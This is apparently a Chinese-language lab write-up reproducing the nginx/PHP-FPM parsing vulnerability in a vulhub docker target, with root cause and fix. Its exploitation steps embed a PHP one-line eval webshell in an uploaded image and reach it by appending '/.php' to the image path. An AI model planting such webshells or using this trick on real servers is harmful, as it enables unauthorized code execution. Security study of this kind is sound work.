漏洞復現-nginx_parsing_vulnerability-nginx解析漏洞
阿新 • • 發佈:2021-09-27
0x00 實驗環境
攻擊機:Win 10
靶場:docker拉的vulhub靶場
0x01 影響版本
一些配置錯誤的情況,與nginx、php版本無關。
常常出現為nginx解析任意檔案為php而導致解析漏洞。
0x02 漏洞復現
(1)上傳一張正常的圖片,然後在上傳圖片時進行抓包:
(2)如上圖所示,在圖片的資料報文中加入一句話木馬:
<?php @eval($_POST['x']);?>
(3)上傳完成後能看到圖片上傳的路徑,點選訪問,能成功訪問到後,在圖片檔名後加一個/.php
發現成功上傳併成功解析為php檔案。
(4)使用蟻劍直接連線即可:
0x03 漏洞原理
nginx.conf的如下配置導致nginx把以’.php ’結尾的檔案交給fastcgi處理,為此可以構造http://ip/uploadfiles/test.png/.php (url結尾不一定是‘.php’,任何伺服器端不存在的php檔案均可,比如’a.php’)。
如下圖就是個錯誤的配置:
在這個www-2.conf的配置檔案中,security.limit_extensions被設定為了空,故什麼檔案都是可以執行的,所以在防護的時候,需要將這個配置為.php(即:僅為.php的檔案才能執行)。
0x04 修復建議
設定security.limit_extensions=.php,重啟一下服務即可。
0x05 參考文獻
https://www.cnblogs.com/renhaoblog/p/12874603.html
https://idc.wanyunshuju.com/aqld/1875.html
0x06 免責宣告
本漏洞復現文章僅用於學習、工作與興趣愛好,並立志為網路安全奉獻一份力量,凡是利用本部落格相關內容的無良hackers造成的安全事故均與本人無關!